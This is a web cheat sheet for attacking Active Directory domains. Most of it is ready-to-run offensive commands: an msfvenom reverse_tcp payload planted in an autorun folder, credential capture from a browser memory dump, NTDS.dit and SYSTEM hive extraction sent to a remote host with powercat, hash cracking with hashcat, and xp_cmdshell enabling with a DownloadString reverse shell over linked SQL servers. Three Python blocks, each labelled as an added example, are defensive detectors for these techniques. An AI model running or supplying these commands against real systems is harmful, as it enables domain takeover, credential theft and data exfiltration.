The document provides an Active Directory exploitation cheat sheet with common enumeration and attack methods organized into phases: 1. Reconnaissance including port scanning and Active Directory module commands without RSAT. 2. Domain enumeration covering domains, users, computers, groups and shares. 3. Local privilege escalation detection and exploitation examples. 4. User hunting to find administrative access and logged in users. 5. Account hunting, data exfiltration and obtaining the NTDS.dit file containing hashed passwords.
May 16, 2021 Ethical Hackers Academy

Active Directory Exploitation Cheat Sheet


Active Directory is a Microsoft service that runs on Windows Server and is used to manage
permissions and resources across the network; it also authenticates and authorizes every
user and computer in a Windows domain.

Recent cyber-attacks frequently target vulnerable Active Directory services in enterprise
networks, where an organization manages thousands of computers from a single point of
control, the domain controller, which is one of the services most targeted by APT groups.

Although exploiting Active Directory is a challenging task, this Active Directory
exploitation cheat sheet collects common enumeration and attack methods, organized into the
following phases to keep it simple.

 Recon
 Domain Enum
 Local Privilege Escalation
 User Hunting
 Domain Admin Privileges
 Database Hunting
 Data Exfiltration
 Active Directory Exploitation Tools


Reconnaissance
The Recon phase contains various modules, including a port scan that performs the following
operations.

PORT SCAN

Import-Module Invoke-Portscan.ps1
<#
Invoke-Portscan -Hosts "[Link],[Link],[Link]" -TopPorts 50
echo [Link] | Invoke-Portscan -oG [Link] -f -ports "80,443,8080"
Invoke-Portscan -Hosts [Link]/24 -T 4 -TopPorts 25 -oA localnet
#>

AD MODULE WITHOUT RSAT

The trick to running AD enumeration commands from the ActiveDirectory PowerShell module on a
system without RSAT installed is the module DLL, located
in C:\Windows\[Link]\assembly\GAC_64\[Link]
on a system that has RSAT installed.

Set up your AD VM, install RSAT, extract the DLL and drop it on the system used to
enumerate the Active Directory.

Import-Module .\[Link]
Get-Command get-adcom*

Domain Enumeration
DOMAIN

 Get current domain

Get-NetDomain (PowerView)
Get-ADDomain (ActiveDirectory Module)

 Get object of another domain

Get-NetDomain -Domain [Link]


Get-ADDomain -Identity [Link]

 Get domain SID for the current domain

Get-DomainSID
(Get-ADDomain).DomainSID

 Get domain policy for the current domain

Get-DomainPolicy
(Get-DomainPolicy)."system access"

 Get domain policy for another domain

(Get-DomainPolicy -domain [Link])."system access"

 Get domain controllers for the current domain

Get-NetDomainController
Get-ADDomainController

 Get domain controllers for another domain

Get-NetDomainController -Domain [Link]


Get-ADDomainController -DomainName [Link] -Discover

NETUSER

 Get a list of users in the current domain

Get-NetUser
Get-NetUser -Username student1
Get-NetUser | select -ExpandProperty samaccountname
Get-ADUser -Filter * -Properties *
Get-ADUser -Identity student1 -Properties *

 Get list of all properties for users in the current domain

Get-UserProperty
Get-UserProperty -Properties pwdlastset
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name
Get-ADUser -Filter * -Properties * | select name,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}

 Search for a particular string in a user's attributes

Find-UserField -SearchField Description -SearchTerm "built"


Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description

NETGROUP

 Get a list of computers in the current domain

Get-NetComputer
Get-NetComputer -OperatingSystem "*Server 2016*"
Get-NetComputer -Ping
Get-NetComputer -FullData
Get-ADComputer -Filter * | select Name
Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select Name,OperatingSystem
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName}
Get-ADComputer -Filter * -Properties *

 Get all the groups in the current domain

Get-NetGroup
Get-NetGroup -Domain <targetdomain>
Get-NetGroup -FullData
Get-ADGroup -Filter * | select Name
Get-ADGroup -Filter * -Properties *

 Get all groups containing the word "admin" in group name

Get-NetGroup *admin*
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name

 Get all the members of the Domain Admins group

Get-NetGroupMember -GroupName "Domain Admins" -Recurse


Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-NetGroupMember -GroupName "Enterprise Admins" -Domain [Link]

 Get the group membership for a user

Get-NetGroup -UserName "john"


Get-ADPrincipalGroupMembership -Identity student1

 List all the local groups on a machine (needs administrator privs on non-DC machines)

Get-NetLocalGroup -ComputerName [Link] -ListGroups

 Get members of all the local groups on a machine (needs administrator privs on non-DC machines)

Get-NetLocalGroup -ComputerName [Link] -Recurse

LOGGED

 Get actively logged users on a computer (needs local admin rights on the target)

Get-NetLoggedon -ComputerName <servername>

 Get locally logged users on a computer (needs remote registry on the target - started by default on server OS)

Get-LoggedonLocal -ComputerName [Link]

 Get the last logged user on a computer (needs administrative rights and remote registry on the target)

Get-LastLoggedOn -ComputerName <servername>

SHARE

 Find shares on hosts in current domain

Invoke-ShareFinder -Verbose
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC -Verbose

 Find sensitive files on computers in the domain

Invoke-FileFinder -Verbose

 Get all fileservers of the domain


Get-NetFileServer

Local Privilege Escalation


Detection

Windows VM

1. Open command prompt and type: C:\Users\User\Desktop\Tools\Autoruns\[Link]
2. In Autoruns, click on the ‘Logon’ tab.
3. From the listed results, notice that the “My Program” entry is pointing to “C:\Program Files\Autorun Program\[Link]”.
4. In command prompt type: C:\Users\User\Desktop\Tools\Accesschk\[Link] -wvu "C:\Program Files\Autorun Program"
5. From the output, notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the “[Link]” file.
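The condition steps 4 and 5 expose is a low-privilege principal holding write access on a binary that runs at logon, which is what a defender wants to find across every autorun location before anyone else does. The Python script below is an added example, not part of the original cheat sheet: it parses accesschk-style output and reports each path that Everyone, Users, Authenticated Users or INTERACTIVE can modify. The sample text is constructed, the file name program.exe is a placeholder, and the layout the parser assumes (an unindented path line, indented `RW <principal>` lines, deeper-indented right names) is an assumption about the tool's `-wvu` output.

```python
import re
from typing import List, Tuple

# Principals that should never hold write access on a binary launched at logon.
# Comparison is case-insensitive; extend the set for local "Users" aliases as needed.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# Rights that allow replacing or altering the file (or its ACL/owner).
WRITE_RIGHTS = {
    "FILE_ALL_ACCESS", "FILE_GENERIC_WRITE", "FILE_WRITE_DATA",
    "FILE_APPEND_DATA", "DELETE", "WRITE_DAC", "WRITE_OWNER",
}

# "  RW Everyone" style lines: 1-3 spaces, access letters, principal name.
ACCESS_RE = re.compile(r"^\s{1,3}(RW|R|W)\s+(\S.*?)\s*$")
# Deeper-indented lines naming individual rights, e.g. "        FILE_ALL_ACCESS".
RIGHT_RE = re.compile(r"^\s{4,}([A-Z_]+)\s*$")


def parse_accesschk(text: str) -> List[Tuple[str, str, str, Tuple[str, ...]]]:
    """Turn accesschk -wvu style output into (path, principal, access, rights) tuples.

    Assumed layout (constructed for this example): an unindented path line, then
    one indented "<R|W|RW> <principal>" line per ACE, each followed by the
    individual right names indented further.
    """
    entries = []
    path = None
    current = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():          # a new object path
            path = line.strip()
            current = None
            continue
        m = ACCESS_RE.match(line)
        if m and path is not None:         # a new ACE for the current path
            current = [path, m.group(2), m.group(1), []]
            entries.append(current)
            continue
        m = RIGHT_RE.match(line)
        if m and current is not None:      # a right belonging to the current ACE
            current[3].append(m.group(1))
    return [(p, who, acc, tuple(rights)) for p, who, acc, rights in entries]


def find_weak_autorun_acls(text: str) -> List[Tuple[str, str, str]]:
    """Return (path, principal, rights) for every low-privilege principal with write access."""
    findings = []
    for path, principal, access, rights in parse_accesschk(text):
        if principal.lower() not in LOW_PRIV_PRINCIPALS:
            continue
        # accesschk prints W in the access column when any write right is granted;
        # the explicit right names are checked too in case only those are present.
        if "W" in access or WRITE_RIGHTS.intersection(rights):
            findings.append((path, principal, ", ".join(rights) or access))
    return findings


# Constructed sample: the first path has the misconfiguration from the lab above,
# the second is correctly locked down (both file names are placeholders).
SAMPLE_ACCESSCHK = """\
C:\\Program Files\\Autorun Program\\program.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\\Administrators
        FILE_ALL_ACCESS
C:\\Program Files\\Good Program\\good.exe
  R  BUILTIN\\Users
        FILE_EXECUTE
        FILE_READ_DATA
  RW BUILTIN\\Administrators
        FILE_ALL_ACCESS
"""

if __name__ == "__main__":
    for path, who, rights in find_weak_autorun_acls(SAMPLE_ACCESSCHK):
        print(f"WEAK ACL: {who} has {rights} on {path}")
```

Run it against the saved output of accesschk over every path Autoruns lists; each reported line is a binary that any local user could replace, so the fix is to strip the write ACE (or move the program under a directory only Administrators can write to) rather than to wait for the logon-time execution.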

Exploitation

Kali VM

1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o [Link]
7. Copy the generated file, [Link], to the Windows VM.

Windows VM

1. Place [Link] in ‘C:\Program Files\Autorun Program’.


2. To simulate the privilege escalation effect, logoff and then log back on as an
administrator user.

Kali VM

1. Wait for a new session to open in Metasploit.


2. In Metasploit (msf > prompt) type: sessions -i [Session ID]
3. To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid

Memory

Exploitation
Kali VM

1. Open command prompt and type: msfconsole


2. In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic
3. In Metasploit (msf > prompt) type: set uripath x
4. In Metasploit (msf > prompt) type: run

Windows VM

1. Open Internet Explorer and browse to: [Link] VM IP Address]/x
2. Open command prompt and type: taskmgr
3. In Windows Task Manager, right-click on “[Link]” in the "Image Name" column and select “Create Dump File” from the popup menu.
4. Copy the generated file, [Link], to the Kali VM.

Kali VM

1. Place '[Link]' on the desktop.
2. Open command prompt and type: strings /root/Desktop/[Link] | grep "Authorization: Basic"
3. Select and copy the Base64 encoded string.
4. In command prompt type: echo -ne [Base64 String] | base64 -d
5. Notice the credentials in the output.

4. User Hunting
 Find all machines on the current domain where the current user has local admin access (Get-NetComputer + Invoke-CheckLocalAdminAccess)

Find-LocalAdminAccess -Verbose

 Find Administrative access

. .\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
# No Stateful
Enter-PSSession -ComputerName [Link]
# Stateful
$sess = New-Pssession -ComputerName [Link]
Enter-Pssession -session $sess

 If RPC and SMB are blocked check with WMI

. .\Find-WMILocalAdminAccess.ps1

 Find local admins on all machines of the domain (Get-NetComputer + Get-NetLocalGroup)

Invoke-EnumerateLocalAdmin -Verbose

 Find computers where a domain admin (or specified user/group) has sessions

Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"

 Confirm admin access

Invoke-UserHunter -CheckAccess

 Find computers where a domain admin is logged-in (Get-NetSession / Get-NetLoggedon)

Invoke-UserHunter -Stealth

 Wait for an incoming session

Invoke-UserHunter -ComputerName targetserver -Poll 100 -UserName Administrator -Delay 5 -Verbose

5. Account Hunting & Data Exfiltration


Obtaining [Link] Using ntdsutil
ntdsutil
activate instance ntds
ifm
create full C:\ntdsutil
quit
quit

Obtaining [Link] Using vssadmin

mkdir c:\extract
REM -> c:\Windows\system32
vssadmin create shadow /for=c:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\ntds\[Link] c:\extract\[Link]
reg SAVE HKLM\SYSTEM c:\extract\SYS
REM yes
REM exfiltrate to your attacker computer
REM housekeeping
vssadmin delete shadows /shadow={PATH} /Quiet

Obtaining [Link] Using shadow copy (SeBackup)


# Create [Link] file that will contain the shadow copy process script
#Script ->{
set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\[Link]
set verbose on
begin backup
add volume c: alias mydrive

create

expose %mydrive% w:
end backup
#}

# TRANSFER TO TARGET SYSTEM

Invoke-WebRequest -Uri "[Link]" -OutFile "C:\windows\system32\spool\drivers\color\[Link]"

# EXEC DISKSHADOW
cd C:\windows\system32\spool\drivers\color
[Link] -s [Link]

# CHECK THE CAB


ls
-a---- 6/7/2020 9:31 PM 743 [Link]

# IMPORTING DLL SeBackupPrivilegeCmdLets & SeBackupPrivilegeUtils

Invoke-WebRequest -Uri "[Link]" -OutFile "C:\windows\system32\spool\drivers\color\[Link]"
Invoke-WebRequest -Uri "[Link]" -OutFile "C:\windows\system32\spool\drivers\color\[Link]"
Import-Module .\[Link]
Import-Module .\[Link]

# CHECK MODULE
get-help SeBackupPrivilege
Name Category Module Synopsis
---- -------- ------ --------
Get-SeBackupPrivilege Cmdlet SeBackupPrivilegeCmdLets ...
Set-SeBackupPrivilege Cmdlet SeBackupPrivilegeCmdLets ...
Copy-FileSeBackupPrivilege Cmdlet SeBackupPrivilegeCmdLets ...

# Use the functionality of the DLLs to copy the [Link] database file from the shadow copy to a location of our choice
Copy-FileSeBackupPrivilege w:\windows\NTDS\[Link] c:\Windows\temp\[Link] -Overwrite

# Dump ACTUAL SYSTEM hive


[Link] save HKLM\SYSTEM c:\temp\[Link]

# FILE TRANSFER
powercat -c [Link] -p 443 -i c:\Windows\temp\[Link]
powercat -c [Link] -p 443 -i c:\Windows\temp\[Link]
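Each of the three extraction routes above (ntdsutil ifm, vssadmin plus a copy out of the shadow copy, diskshadow with the SeBackupPrivilege cmdlets) leaves a process-creation record, so the first detection a defender writes is a command-line match on Security event 4688 or Sysmon event 1. The Python below is an added example, not part of the cheat sheet: the sample events are constructed JSON lines in the shape of a SIEM export (the field names EventID, Computer, SubjectUserName and CommandLine are an assumption about that export), and the rules are built only from the commands shown in this section.

```python
import json
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Set

# Detection rules derived from the commands in the section above. Each regex is
# applied to the lower-cased command line of a process-creation event.
NTDS_RULES = [
    ("ntdsutil_ifm",             re.compile(r"ntdsutil.*\b(ifm|create full)\b")),
    ("vssadmin_create_shadow",   re.compile(r"vssadmin.*create\s+shadow")),
    ("diskshadow_script",        re.compile(r"diskshadow(\.exe)?\s.*(/s|-s)\s")),
    ("shadowcopy_path_access",   re.compile(r"harddiskvolumeshadowcopy\d+")),
    ("ntds_dit_reference",       re.compile(r"\\ntds\\ntds\.dit")),
    ("reg_save_system_hive",     re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b")),
    ("sebackupprivilege_cmdlet", re.compile(r"sebackupprivilege")),
]

# Event IDs that carry a command line: Security 4688 and Sysmon 1.
PROCESS_EVENT_IDS = {"4688", "1"}


def scan_process_events(lines: Iterable[str]) -> List[Dict]:
    """Return one hit per process-creation event whose command line matches a rule."""
    hits = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        ev = json.loads(raw)
        if str(ev.get("EventID")) not in PROCESS_EVENT_IDS:
            continue                      # logons etc. carry no command line
        cmd = ev.get("CommandLine", "")
        matched = [name for name, rx in NTDS_RULES if rx.search(cmd.lower())]
        if matched:
            hits.append({
                "host": ev.get("Computer"),
                "user": ev.get("SubjectUserName"),
                "rules": matched,
                "cmd": cmd,
            })
    return hits


def rules_per_host(hits: List[Dict]) -> Dict[str, Set[str]]:
    """Group matched rule names by host: several distinct rules on one host within a
    short window is the pattern of a full NTDS.dit plus SYSTEM hive extraction."""
    summary = defaultdict(set)
    for h in hits:
        summary[h["host"]].update(h["rules"])
    return dict(summary)


# Constructed sample events (not real telemetry); hosts, users and paths are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 4688, "Computer": "DC01", "SubjectUserName": "svc-backup",
     "CommandLine": r"C:\Windows\System32\vssadmin.exe create shadow /for=C:"},
    {"EventID": 4688, "Computer": "DC01", "SubjectUserName": "svc-backup",
     "CommandLine": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\ntds.dit C:\extract\ntds.dit"},
    {"EventID": 4688, "Computer": "DC01", "SubjectUserName": "svc-backup",
     "CommandLine": r"reg.exe save HKLM\SYSTEM C:\extract\SYS"},
    {"EventID": 4688, "Computer": "DC01", "SubjectUserName": "admin-jdoe",
     "CommandLine": r'ntdsutil.exe "activate instance ntds" ifm "create full C:\ntdsutil" quit quit'},
    {"EventID": 4688, "Computer": "WS07", "SubjectUserName": "jdoe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"EventID": 4624, "Computer": "DC01", "SubjectUserName": "svc-backup"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    hits = scan_process_events(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f"{h['host']} {h['user']}: {h['rules']} <- {h['cmd']}")
    print(rules_per_host(hits))
```

Command-line logging must be enabled for 4688 (the "Include command line in process creation events" policy) or the CommandLine field is empty and nothing here fires; on a domain controller, any of these rules outside a known backup window is worth an immediate look, and the per-host summary is what turns four separate alerts into one incident.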

Rebuild AD Hashes
 -ntds: location and name of the [Link] file
 -system: location and name of the SYSTEM hive
 -hashes lmhash:nthash: NTLM hash
 LOCAL: parse files on the local system
 -outputfile: location and name of the output file. Extensions are automatically added based on content extracted

# impacket
[Link] -ntds [Link] -system SYS -hashes lmhash:nthash LOCAL -outputfile ntlm-extract

Install your NVIDIA Driver for GPU Power


apt install -y nvidia-driver nvidia-cuda-toolkit
apt install -y mesa-utils
# CHECK
nvidia-smi
# CHECK
nvidia-smi -i 0 -q
# CHECK
glxinfo | grep -i "direct rendering"

Cracking

 -m 1000: NTLM | Operating Systems
 [Link]: secretsdump outfile
 /usr/share/wordlists/[Link]: plaintext wordlist
 -o: location of cracked hash

hashcat -m 1000 [Link] /usr/share/wordlists/[Link] -o cracked
cat cracked

Database Hunting - MSSQL


Tool : PowerUpSQL

Import-Module .\PowerupSQL.psd1

Discovery (SPN Scanning)

Get-SQLInstanceDomain

Discover Local SQL Server Instances

Get-SQLInstanceLocal -Verbose
Discover Remote SQL Server Instances

Get-SQLInstanceBroadcast -Verbose
Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1
Get-SQLInstanceFile -FilePath c:\temp\[Link] | Get-SQLInstanceScanUDPThreaded -Verbose

Discover Active Directory Domain SQL Server Instances using alternative domain credentials

runas /noprofile /netonly /user:domain\user [Link]
import-module PowerUpSQL.psd1
Get-SQLInstanceDomain -Verbose -DomainController [Link] -Username domain\user -password 'P@ssword123'

Check Accessibility

Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

Gather Information

Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

Look for links to remote servers

Get-SQLServerLink -Instance db-mssql -Verbose

Enumerating Database Links

Get-SQLServerLinkCrawl -Instance db-mssql -Verbose

List SQL Servers using a specific domain account

Get-SQLInstanceDomain -Verbose -DomainAccount SQLSvc

List shared domain user SQL Server service accounts

Get-SQLInstanceDomain -Verbose | Group-Object DomainAccount | Sort-Object count -Descending | select Count,Name | Where-Object {($_.name -notlike "*$") -and ($_.count -gt 1) }

Authenticating to a known SQL Server instance as the current domain user.

Get-SQLQuery -Verbose -Instance "[Link],1433"

Authenticating to a known SQL Server instance using a SQL Server login.

# Server and Instance Name


Get-SQLQuery -Verbose -Instance "servername\instancename" -username testuser -password testpass
# IP and Instance Name
Get-SQLQuery -Verbose -Instance "[Link]\instancename" -username testuser -password testpass
# IP and Port
Get-SQLQuery -Verbose -Instance "[Link],1433" -username testuser -password testpass

Get general server information such as SQL/OS versions, service accounts, sysadmin access, etc.

Get-SQLServerInfo -Verbose -Instance SQLServer1\Instance1
#
$ServerInfo = Get-SQLInstanceDomain | Get-SQLServerInfoThreaded -Verbose -Threads 10
$ServerInfo

Get an inventory of common objects from the remote server including permissions,
databases, tables, views etc, and dump them out into CSV files.

Invoke-SQLDumpInfo -Verbose -Instance Server1\Instance1

Audit for Issues

Invoke-SQLAudit -Verbose -Instance SQLServer1

Execute OS commands: Agent Job - PowerShell

$Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem PowerShell -Command 'write-output "hello world" | out-file c:\windows\temp\[Link]' -Sleep 20

Xp_cmdshell v1

Get-SQLServerLinkCrawl -Instance db-mssql -Query "sp_configure 'show advanced options', '1'"
Get-SQLServerLinkCrawl -Instance db-mssql -Query "RECONFIGURE"
Get-SQLServerLinkCrawl -Instance db-mssql -Query "sp_configure 'xp_cmdshell', '1'"
Get-SQLServerLinkCrawl -Instance db-mssql -Query "RECONFIGURE"

Xp_cmdshell v2

Get-SQLQuery -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "[Link]"'

Xp_cmdshell v3

Get-SQLServerLinkCrawl -Instance DOMAIN\SQLEXPRESS 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "[Link]"'

OSQL Xp_cmdshell

osql -E -S "db-mssql" -Q "EXECUTE('sp_configure ''xp_cmdshell'',1;RECONFIGURE;') AT [[Link]]"
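The four variants above all do the same thing on the remote instance: flip `show advanced options` and `xp_cmdshell` through sp_configure, usually across a linked server with `EXECUTE(...) AT`. On the defending side that gives two checks, a configuration audit of sp_configure output and a pattern match over captured T-SQL (SQL Server Audit or Extended Events). The Python below is an added example, not part of the cheat sheet or of PowerUpSQL: the sp_configure rows and the statements are constructed, and the row keys follow sp_configure's result columns (name, config_value, run_value).

```python
import re
from typing import Dict, List, Tuple

# Options toggled in the section above. run_value is what the engine currently
# enforces; config_value is what the next RECONFIGURE will apply.
WATCHED_OPTIONS = {
    "xp_cmdshell": "high",
    "show advanced options": "info",
}


def audit_sp_configure(rows: List[Dict]) -> List[Tuple[str, str, str]]:
    """Return (option, severity, message) for every watched option that is enabled
    or has an enable pending a RECONFIGURE (config_value 1, run_value 0)."""
    findings = []
    for row in rows:
        name = row["name"].lower()
        if name not in WATCHED_OPTIONS:
            continue
        cfg, run = int(row["config_value"]), int(row["run_value"])
        if run == 1:
            findings.append((name, WATCHED_OPTIONS[name], "enabled (run_value=1)"))
        elif cfg == 1:
            findings.append((name, WATCHED_OPTIONS[name],
                             "enable pending RECONFIGURE (config_value=1, run_value=0)"))
    return findings


# Statement patterns built from the xp_cmdshell examples above; applied to
# lower-cased T-SQL text, so quote doubling ('' or '''') still matches.
SQL_RULES = [
    ("xp_cmdshell_config",       re.compile(r"sp_configure\s*'+\s*xp_cmdshell")),
    ("advanced_options_config",  re.compile(r"sp_configure\s*'+\s*show advanced options")),
    ("xp_cmdshell_exec",         re.compile(r"(master\.\.xp_cmdshell|xp_cmdshell\s+')")),
    ("linked_server_execute_at", re.compile(r"execute\s*\(.*\)\s*at\s")),
]


def classify_statement(sql: str) -> List[str]:
    """Return the names of every rule the statement matches (empty list if benign)."""
    text = sql.lower()
    return [name for name, rx in SQL_RULES if rx.search(text)]


# Constructed samples (not real audit data).
SAMPLE_SP_CONFIGURE = [
    {"name": "show advanced options", "config_value": 1, "run_value": 1},
    {"name": "xp_cmdshell", "config_value": 1, "run_value": 0},
]
SAMPLE_STATEMENTS = [
    "EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT \"SQL02\"",
    "sp_configure 'xp_cmdshell', '1'",
    "SELECT name FROM sys.tables",
    "exec master..xp_cmdshell 'whoami'",
]

if __name__ == "__main__":
    for opt, sev, msg in audit_sp_configure(SAMPLE_SP_CONFIGURE):
        print(f"[{sev}] {opt}: {msg}")
    for s in SAMPLE_STATEMENTS:
        print(classify_statement(s) or "-", "<-", s)
```

The pending-RECONFIGURE case is worth its own message: a `config_value` of 1 with `run_value` 0 means someone has already issued the sp_configure call and only the RECONFIGURE is missing, which is exactly the half-finished state the v1 sequence above passes through. Statement matching on audit data catches the linked-server route, where the enabling statement never appears in the target instance's own query text except inside the `EXECUTE(...) AT` wrapper.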

Executing Commands

Get-SQLServerLinkCrawl -Instance db-mssql -Query "exec master..xp_cmdshell 'whoami'"

Reverse shell

Get-SQLServerLinkCrawl -Instance db-mssql -Query 'exec master..xp_cmdshell "powershell iex (New-Object [Link]).DownloadString(''[Link]

Data mining

Get-SQLInstanceDomain | Get-SQLConnectionTest | Get-SQLColumnSampleDataThreaded -Verbose -Threads 10 -Keyword "credit,ssn,password" -SampleSize 2 -ValidateCC -NoDefaults

Check files

Get-SQLInstanceDomain | Get-SQLConnectionTest | Get-SQLDatabaseThreaded -Verbose -Threads 10 -NoDefaults | Where-Object {$_.is_encrypted -eq "TRUE"} | Get-SQLColumnSampleDataThreaded -Verbose -Threads 10 -Keyword "card, password" -SampleSize 2 -ValidateCC -NoDefaults

Extracting SQL Server Login password hashes

Get-SQLServerPasswordHash -Verbose -Instance MSSQLSERVER2016\db-mssql -Migrate

Active Directory Exploitation Tools


ADACLScanner

ASREPRoast

Adduser-c

AmsiScanBufferBypass

BeRoot

DAMP-master

Deploy-Deception-master
Find-PS-WMI

GhostPack

HFS

HeidiSQL

Invoke-Obfuscation

Invoke-SDPropagator

Kekeo

Mimikatz

NetCease

PowerSploit-Dev

PowerSploit-Master

PowerUpSQL

Powercat

Powerless

Powermad

Privesc-master

PsTools

Python-pty-shells

RSAT

SessionGopher

Set-DCShadow

SharpHound
